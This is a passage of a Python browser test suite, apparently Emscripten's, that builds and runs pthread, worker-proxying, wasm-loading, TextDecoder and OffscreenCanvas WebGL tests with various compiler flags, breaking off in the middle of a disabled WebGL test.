    """Test pthread mutexes, in both normal and spinlock variants."""
    src = path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp')
    base_flags = ['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                  '-s', 'PTHREAD_POOL_SIZE=8']
    for variant in ([], ['-DSPINLOCK_TEST']):
        self.btest(src, expected='50', args=base_flags + variant)
@requires_threads
def test_pthread_attr_getstack(self):
    """Query a thread's stack via pthread_attr_getstack()."""
    src = path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp')
    self.btest(src, expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
    """Concurrent malloc/free from many threads must be thread-safe."""
    src = path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
    """Threads allocate via sbrk()-backed malloc; the main thread frees the data.

    Fix: the args list set INITIAL_MEMORY twice (64MB then 256MB). emcc lets
    the later setting win, so the 64MB entry was dead and misleading; keep
    only the effective 256MB value.
    """
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'),
               expected='0',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8',
                     '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
    """Synchronize a pool of threads with pthread_barrier_wait()."""
    src = path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
    """pthread_once() must run its init routine exactly once across threads."""
    src = path_from_root('tests', 'pthread', 'test_pthread_once.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
def test_pthread_spawns(self):
    """Regression test for thread exit-time handling: spawn a large number of threads."""
    src = path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1',
                     '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
    """Thread control via a flipped volatile global, with and without C volatile."""
    src = path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp')
    base_flags = ['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                  '-s', 'PTHREAD_POOL_SIZE=8']
    for variant in ([], ['-DUSE_C_VOLATILE']):
        self.btest(src, expected='1', args=base_flags + variant)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
    """Per-thread data via the pthread TLS key API."""
    src = path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
    """Create and wait on pthread condition variables."""
    src = path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
    """printf from a pthread, with LIBRARY_DEBUG both on and off."""
    src = path_from_root('tests', 'pthread', 'test_pthread_printf.cpp')
    for debug in (True, False):
        self.btest(src, expected='0',
                   args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                         '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
    """std::cout from a pthread must work."""
    src = path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS',
                     '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
    """unistd I/O under pthreads with WASM_BIGINT enabled."""
    src = path_from_root('tests', 'unistd', 'io.c')
    self.btest_exit(src, 0, args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD',
                                  '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
    """pthread_setspecific/getspecific must also work on the main thread."""
    src = path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp')
    self.btest(src, expected='0',
               args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'],
               also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
    """Filesystem access from inside a pthread."""
    src = path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp')
    self.btest(src, expected='0',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
    """pthread_create() must degrade gracefully when threading is unavailable."""
    src = path_from_root('tests', 'pthread', 'test_pthread_supported.cpp')
    for extra in ([], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']):
        self.btest(src, expected='0', args=['-O3'] + extra)
@requires_threads
def test_pthread_dispatch_after_exit(self):
    """Dispatching work to a thread after it has exited must be handled safely."""
    src = path_from_root('tests', 'pthread', 'test_pthread_dispatch_after_exit.c')
    self.btest_exit(src, 0, args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
    """Verify Module.locateFile can redirect where test.worker.js is fetched from.

    Two variants are checked: a string-prefix style locateFile that routes
    everything except .wasm files to cdn/, and a function that special-cases
    the worker file name only.
    """
    ensure_dir('cdn')
    create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
  emscripten_atomic_store_u32(&result, 1);
  pthread_exit(0);
}
int main() {
  pthread_t t;
  if (emscripten_has_threading_support()) {
    pthread_create(&t, 0, thread_main, 0);
    pthread_join(t, 0);
  } else {
    result = 1;
  }
  REPORT_RESULT(result);
}
''')

    # Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
    create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
    self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
    # Move the worker (and copy the mem init file) into cdn/ so the page only
    # works if locateFile actually redirects the lookups there.
    shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
    shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
    self.run_browser('test.html', '', '/report_result?1')

    # Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
    create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
    self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
    # Delete the freshly-emitted worker so only the cdn/ copy can be found.
    try_delete('test.worker.js')
    self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
    """Proxied operations must not deadlock while the main thread futex-waits."""
    src = path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp')
    self.btest(src, expected='0',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
    """sbrk() correctness under concurrent thread allocations.

    ABORTING_MALLOC=1: thread allocations must succeed (or abort).
    ABORTING_MALLOC=0: over-allocate so that some allocations fail gracefully.
    """
    src = path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp')
    for aborting_malloc in (0, 1):
        print('aborting malloc=' + str(aborting_malloc))
        setting = str(aborting_malloc)
        self.btest(src, expected='0',
                   args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8',
                         '-s', 'ABORTING_MALLOC=' + setting,
                         '-DABORTING_MALLOC=' + setting,
                         '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
    """With ABORTING_MALLOC=0, sbrk failures are graceful, threaded or not."""
    src = path_from_root('tests', 'gauge_available_memory.cpp')
    for opt_flags in ([], ['-O2']):
        for thread_flags in ([], ['-s', 'USE_PTHREADS']):
            self.btest(src, expected='1',
                       args=['-s', 'ABORTING_MALLOC=0'] + thread_flags + opt_flags)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
    """Proxy user callbacks from a pthread to the main thread."""
    src = path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp')
    self.btest(src, expected='0',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
    """Flood the main thread with back-to-back proxied calls."""
    src = path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp')
    self.btest(src, expected='0',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
    """Asynchronously invoke a JS function on the main thread from a pthread."""
    src = path_from_root('tests', 'pthread', 'call_async.c')
    self.btest(src, expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
    """Synchronous JS call to the main thread with a return value, in three configs."""
    src = path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c')
    lib = path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')
    configs = (
        ['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', lib],
        ['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', lib],
        ['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', lib, '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'],
    )
    for opts in configs:
        self.btest(src, expected='1', args=opts)
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
    """Asynchronous JS call to the main thread, in three configs."""
    src = path_from_root('tests', 'pthread', 'call_async_on_main_thread.c')
    lib = path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')
    configs = (
        ['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', lib],
        ['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', lib],
        ['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', lib],
    )
    for opts in configs:
        self.btest(src, expected='7', args=opts)
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
    """Spawning a thread must not reinitialize the global data section.

    Runs across all mem-init-file modes and both a MODULARIZE shell and a
    plain -O3 build.
    """
    mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
    for mem_init_mode in mem_init_modes:
        for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
            self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
    """Same global-data-initialization check, but with synchronous wasm compilation."""
    mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
    for mem_init_mode in mem_init_modes:
        # WASM_ASYNC_COMPILATION=0 forces synchronous instantiation.
        args = ['-s', 'WASM_ASYNC_COMPILATION=0']
        self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
    """emscripten_get_now() must share one wallclock epoch across all threads."""
    src = path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp')
    self.btest(src, expected='1',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
    """UTF-8 string conversion helpers must work on pthreads."""
    src = path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp')
    self.btest(src, expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
    """emscripten_futex_wake(addr, INT_MAX) must wake every waiter."""
    src = path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp')
    self.btest(src, expected='0',
               args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB',
                     '-s', 'NO_EXIT_RUNTIME'],
               also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
    """Stack base/max must correctly bound a pthread's stack."""
    src = path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp')
    self.btest(src, expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
    """C++ thread_local variables on pthreads (main proxied to a pthread)."""
    src = path_from_root('tests', 'pthread', 'test_pthread_tls.cpp')
    self.btest(src, expected='1337',
               args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
    """C++ thread_local on the browser main thread (no PROXY_TO_PTHREAD)."""
    src = path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp')
    self.btest(src, expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
    """STACK_OVERFLOW_CHECK=2 must catch overflow on a pthread's stack."""
    # Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
    # and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
    # same stack size as the main thread normally would.
    src = path_from_root('tests', 'core', 'test_safe_stack.c')
    pre_js = path_from_root('tests', 'pthread', 'test_safe_stack.js')
    self.btest(src, expected='1',
               args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD',
                     '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB',
                     '--pre-js', pre_js])
@parameterized({
    'leak': ['test_pthread_lsan_leak', ['-g4']],
    'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
    """LeakSanitizer leak/no-leak fixtures under pthreads."""
    src = path_from_root('tests', 'pthread', name + '.cpp')
    pre_js = path_from_root('tests', 'pthread', name + '.js')
    self.btest(src, expected='1',
               args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB',
                     '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD',
                     '--pre-js', pre_js] + args)
@parameterized({
    # Reusing the LSan test files for ASan.
    'leak': ['test_pthread_lsan_leak', ['-g4']],
    'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
    """AddressSanitizer run over the LSan leak/no-leak fixtures under pthreads."""
    src = path_from_root('tests', 'pthread', name + '.cpp')
    pre_js = path_from_root('tests', 'pthread', name + '.js')
    self.btest(src, expected='1',
               args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB',
                     '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD',
                     '--pre-js', pre_js] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
    """ASan must detect a use-after-free occurring under pthreads."""
    src = path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp')
    pre_js = path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')
    self.btest(src, expected='1',
               args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB',
                     '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD',
                     '--pre-js', pre_js])
@requires_threads
def test_pthread_exit_process(self):
    """With EXIT_RUNTIME, process exit runs onExit and reports the exit status."""
    pre_js = path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')
    build_args = ['-s', 'USE_PTHREADS',
                  '-s', 'PROXY_TO_PTHREAD',
                  '-s', 'PTHREAD_POOL_SIZE=2',
                  '-s', 'EXIT_RUNTIME',
                  '-DEXIT_RUNTIME',
                  '-O0',
                  '--pre-js', pre_js]
    self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'),
               expected='onExit status: 42', args=build_args)
@requires_threads
def test_pthread_no_exit_process(self):
    """Same as test_pthread_exit_process but without EXIT_RUNTIME.

    In this case we don't expect onExit to ever be called.
    """
    pre_js = path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')
    build_args = ['-s', 'USE_PTHREADS',
                  '-s', 'PROXY_TO_PTHREAD',
                  '-s', 'PTHREAD_POOL_SIZE=2',
                  '-O0',
                  '--pre-js', pre_js]
    self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'),
               expected='43', args=build_args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
    """MAIN_THREAD_EM_ASM_INT() signatures, without pthreads."""
    src = path_from_root('tests', 'core', 'test_em_asm_signatures.cpp')
    self.btest_exit(src, expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
    """MAIN_THREAD_EM_ASM_INT() signatures with pthreads and a proxied main."""
    src = path_from_root('tests', 'core', 'test_em_asm_signatures.cpp')
    self.btest_exit(src, expected='121',
                    args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD',
                          '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
    """MAIN_THREAD_ASYNC_EM_ASM from a proxied main thread."""
    src = path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp')
    self.btest_exit(src, expected=0,
                    args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD',
                          '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
    """A proxied main thread must be able to block on an EM_ASM call to the page."""
    shell = open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read()
    create_test_file('page.html', shell)
    self.compile_btest([path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp'),
                        '-O2', '-o', 'wasm.js',
                        '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
    self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
    """alarm() must deliver SIGALRM to the handler installed with signal()."""
    src = path_from_root('tests', 'sigalrm.cpp')
    self.btest(src, expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
    """Canvas style manipulation must be proxied correctly to a worker."""
    shell = path_from_root('tests/canvas_style_proxy_shell.html')
    pre_js = path_from_root('tests/canvas_style_proxy_pre.js')
    self.btest('canvas_style_proxy.c', expected='1',
               args=['--proxy-to-worker', '--shell-file', shell, '--pre-js', pre_js])
def test_canvas_size_proxy(self):
    """Canvas size queries must be proxied correctly to a worker."""
    src = path_from_root('tests', 'canvas_size_proxy.c')
    self.btest(src, expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
    """Custom postMessage traffic must work through the worker proxy."""
    shell = path_from_root('tests', 'custom_messages_proxy_shell.html')
    post_js = path_from_root('tests', 'custom_messages_proxy_postjs.js')
    self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1',
               args=['--proxy-to-worker', '--shell-file', shell, '--post-js', post_js])
def test_vanilla_html_when_proxying(self):
    """A hand-written HTML page embedding the proxied JS must still work."""
    src = path_from_root('tests', 'browser_test_hello_world.c')
    for opt_level in (0, 1, 2):
        print(opt_level)
        self.compile_btest([src, '-o', 'test.js', '-O' + str(opt_level), '--proxy-to-worker'])
        create_test_file('test.html', '<script src="test.js"></script>')
        self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
    # test the XHR for an asm.js mem init file being in flight already
    """Check handling of an already-in-flight XHR for the asm.js mem init file.

    With custom HTML the in-flight request never happens; with the default
    HTML it should happen only when a mem init file exists (-O2 and up).
    """
    for o in [0, 1, 2]:
        print(o)
        opts = ['-O' + str(o), '-s', 'WASM=0']

        print('plain html')
        self.compile_btest([path_from_root('tests', 'in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
        create_test_file('test.html', '<script src="test.js"></script>')
        self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.

        print('default html')
        self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
    # notice when we use async compilation
    """Detect whether wasm compilation is async by hooking WebAssembly.instantiate*.

    The injected shell script records a flag when the async instantiation
    entry points are used; builds then assert the expected mode (async by
    default, sync when WASM_ASYNC_COMPILATION=0).
    """
    script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
  WebAssembly.instantiateStreaming = function(a, b) {
    Module.sawAsyncCompilation = true;
    return real_wasm_instantiateStreaming(a, b);
  };
} else {
  WebAssembly.instantiate = function(a, b) {
    Module.sawAsyncCompilation = true;
    return real_wasm_instantiate(a, b);
  };
}
// show stderr for the viewer's fun
err = function(x) {
  out('<<< ' + x + ' >>>');
  console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
    shell_with_script('shell.html', 'shell.html', script)
    common_args = ['--shell-file', 'shell.html']
    # Each entry pairs extra flags with the expected sawAsyncCompilation value.
    for opts, expect in [
        ([], 1),
        (['-O1'], 1),
        (['-O2'], 1),
        (['-O3'], 1),
        (['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
        (['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
    ]:
        print(opts, expect)
        self.btest_exit('binaryen_async.c', expected=expect, args=common_args + opts)
    # Ensure that compilation still works and is async without instantiateStreaming available
    no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
    shell_with_script('shell.html', 'shell.html', no_streaming + script)
    self.btest_exit('binaryen_async.c', expected=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
    """A user-supplied Module.instantiateWasm() callback must be honored."""
    self.compile_btest([path_from_root('tests/manual_wasm_instantiate.cpp'),
                        '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN'])
    # The test's own HTML page implements instantiateWasm manually.
    shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'),
                    'manual_wasm_instantiate.html')
    self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded',
                     '/report_result?1')
def test_wasm_locate_file(self):
    """Test that Module.locateFile() can redirect where test.wasm is loaded from
    (here: a cdn/ subdirectory)."""
    ensure_dir('cdn')
    # Read the stock shell via a context manager so the file handle is closed
    # deterministically (the original leaked an open() handle), then patch in
    # a locateFile handler that serves test.wasm from cdn/.
    with open(path_from_root('src', 'shell.html')) as f:
        shell = f.read()
    create_test_file('shell2.html', shell.replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
    self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
    shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
    self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
    """Run the UTF-8 decoding benchmark against its embedded corpus file."""
    self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])

def test_utf16_textdecoder(self):
    """Run the UTF-16 decoding benchmark against its embedded corpus file."""
    self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])

def test_TextDecoder(self):
    """Check the JS size impact of the TEXTDECODER setting.

    Expected ordering: TEXTDECODER=2 (TextDecoder only, no JS fallback) is
    smallest, TEXTDECODER=0 (pure JS fallback) is in the middle, and the
    default (TextDecoder plus fallback) is largest.
    """
    self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
    just_fallback = os.path.getsize('test.js')
    self.btest('browser_test_hello_world.c', '0')
    td_with_fallback = os.path.getsize('test.js')
    self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
    td_without_fallback = os.path.getsize('test.js')
    self.assertLess(td_without_fallback, just_fallback)
    self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
    """Sanity-check the emitted JS size when all the size-reducing flags are on."""
    self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
    # Check an absolute js code size, with some slack.
    size = os.path.getsize('test.js')
    print('size:', size)
    # Note that this size includes test harness additions (for reporting the result, etc.).
    self.assertLess(abs(size - 5368), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
    """Render WebGL in a pthread via OffscreenCanvas, optionally chaining the
    canvas transfer across two threads."""
    for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
        self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])

# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
    """Render WebGL on the main thread after a pthread used the canvas first
    (currently disabled, see the @disabled reason)."""
    for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
